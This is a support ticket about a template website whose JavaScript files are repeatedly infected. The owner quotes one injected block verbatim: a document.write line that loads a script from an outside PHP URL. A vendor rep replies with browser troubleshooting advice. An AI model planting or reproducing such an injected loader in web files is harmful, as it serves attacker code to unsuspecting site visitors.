Okay
  Public Ticket #187014
urgent - require security assistance for Visia template
Closed

Comments

  • Patrick started the conversation

    Our new template website is being hacked by some malware.

    webamp.ca

    Its the 3rd time this month that someone manages to inject javascript code into all our javascript files (at bottom of each js file):

    Example:

    /*81c288*/

    /**//**/

    /**/

    document.write("<script type='text/javascript' src='http://bodadominicana.com/cNbkKP4W.php'></"+ "script>");

    /**/

    /*/81c288*/

    I need to put a stop to this, can you help?

    Everytime a remove the code, a few days later a new one is added to our files with different url.

    Our website is hosted on our shared server and unfortunately I tried asking the support team for a way to only allow certain IP addresses to access FTP but they can't do that. The only thing I managed to do is add a password to the javascript directory so that its protected... didn't help.

    Please let me know what can be done.

    P.S. Im leaving for business trip on Sunday early morning, would like to handle this issue before I leave if you can assist us.

  •  14
    Nick replied

    Hi Patrick,

    I don't see any suspicious code on the js files as you said above, so I think that maybe some kind of software you have installed on your browser may cause this behaviour (such as extensions, extra bars etc.)

    Can you try the site from a different browser (freshly installed on your machine) and see if you get the suspicious behaviour again?


    aetherthemes

  • Patrick replied

    HI Nick,

    Thats because I removed all the lines of codes from all the js files. It was causing google to put a warning on my website.

  •  14
    Nick replied

    Can you try the site from a different browser (freshly installed on your machine) and see if you get the suspicious behaviour again?


    aetherthemes